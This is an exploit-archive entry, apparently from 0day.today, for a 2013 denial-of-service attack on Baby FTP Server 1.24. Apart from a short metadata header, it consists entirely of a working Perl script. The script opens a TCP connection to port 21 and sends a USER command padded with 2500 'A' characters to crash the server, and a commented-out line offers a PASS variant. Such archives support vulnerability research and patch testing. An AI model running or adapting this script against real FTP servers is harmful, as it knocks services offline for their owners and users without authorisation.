id: 20940
date: 06/26/2013
title: Baby FTP Server 1.24 - Denial Of Service
author: Chako
cves: 

#!/usr/bin/perl
use IO::Socket;
  
$TARGET = "127.0.0.1";
$PORT   = 21;
$JUNK = "\x41" x 2500;
  
$PAYLOAD = "USER ".$JUNK."\r\n";
#$PAYLOAD = "PASS ".$JUNK."\r\n";
 
  
$SOCKET = IO::Socket::INET->new(Proto=>'TCP', 
                                PeerHost=>$TARGET, 
                                PeerPort=>$PORT) or die "Error: $TARGET :$PORT\n";
  
$SOCKET->send($PAYLOAD);
  
close($SOCKET);

#  0day.today [2023-03-24]  #